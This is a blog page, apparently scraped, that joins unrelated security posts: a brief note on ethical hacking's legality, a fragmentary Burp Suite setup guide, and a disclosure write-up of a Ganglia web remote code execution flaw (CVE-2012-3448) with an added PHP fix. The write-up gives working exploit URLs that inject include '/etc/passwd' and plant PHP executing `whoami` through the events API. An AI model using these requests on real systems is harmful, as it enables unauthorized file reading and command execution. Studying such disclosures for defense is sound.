LEGALITY OF ETHICAL HACKING

Posted by KP-3မိသားစု |

Why ethical hacking?
Legality of Ethical Hacking
 
Ethical hacking is legal if the hacker abides by the rules stipulated in the above section on the definition of ethical hacking.

Ethical hacking is not legal for black hat hackers. They gain unauthorized access to a computer system or network for money extortion.

BurpSuite Introduction & Installation

Posted by KP-3မိသားစု |



What is BurpSuite?
Burp Suite is a Java-based web penetration testing framework. It has become an industry-standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an interception proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) man in the middle, capturing each request to and response from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking to BurpSuite. It always seems to have everything I need, and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or later
Knowledge of Firefox Add-ons and installation
The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.html and make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.






You need to install a compatible version of Java so that you can run BurpSuite.


Extending Your Ganglia Install With The Remote Code Execution API

Posted by KP-3မိသားစု |

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers; unfortunately, it is slightly broken. For some reason, when this API was being developed, part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According to the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")". From a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php), it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful: we can get a nice report with a list of current system users. Reporting like this is a nice feature, but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application, it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows a Ganglia user to configure events in the system. I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screenshot, I have marked the "Event Summary" with "php here". When creating our API extension event, we will fill in this event with the command we wish to run; see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are; that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location, "/var/lib/ganglia/conf/events.json", let's go ahead and include this file in our API call -
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448
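
The root cause described above is that graph.php hands the argument part of "g" to eval() after escapeshellcmd(), which escapes shell metacharacters but leaves paired quotes and PHP keywords such as include untouched. The following is an added example (not Ganglia's code and not its actual fix) that dispatches through an allowlist and passes arguments as data instead of code; graph_cpu_report(), GRAPH_HANDLERS and parse_graph_param() are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example, not Ganglia code. graph_cpu_report(), GRAPH_HANDLERS and
// parse_graph_param() are hypothetical names used for illustration.

function graph_cpu_report(array &$rrdtool_graph, ...$args): void
{
    $rrdtool_graph['title'] = 'CPU report';
    $rrdtool_graph['extra'] = $args;
}

// Allowlist: name accepted in the request => function that may be called.
const GRAPH_HANDLERS = ['cpu_report' => 'graph_cpu_report'];

// Split "name,arg1,arg2" into a known handler and plain scalar arguments.
function parse_graph_param(string $raw): array
{
    $parts = explode(',', $raw);
    $name  = array_shift($parts);
    if (!array_key_exists($name, GRAPH_HANDLERS)) {
        throw new InvalidArgumentException('unknown graph name');
    }
    $args = [];
    foreach ($parts as $p) {
        if (preg_match('/\A-?\d+(\.\d+)?\z/', $p)) {
            $args[] = $p + 0;                   // numeric literal
        } elseif (preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $p)) {
            $args[] = $p;                       // short identifier, kept as a string
        } else {
            throw new InvalidArgumentException('rejected graph argument');
        }
    }
    return [GRAPH_HANDLERS[$name], $args];
}

// Constructed inputs: an ordinary request and the "g" value shown in the article.
$samples = ['cpu_report,4,large', "cpu_report,include '/etc/passwd'"];
foreach ($samples as $g) {
    try {
        [$handler, $args] = parse_graph_param($g);
        $rrdtool_graph = [];
        $handler($rrdtool_graph, ...$args);     // direct call: arguments are never parsed as PHP
        echo "rendered: $g\n";
    } catch (InvalidArgumentException $e) {
        echo "blocked ({$e->getMessage()}): $g\n";
    }
}
```

Because no request data reaches eval() or include, content written to events.json through the events API stays inert JSON in this design.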
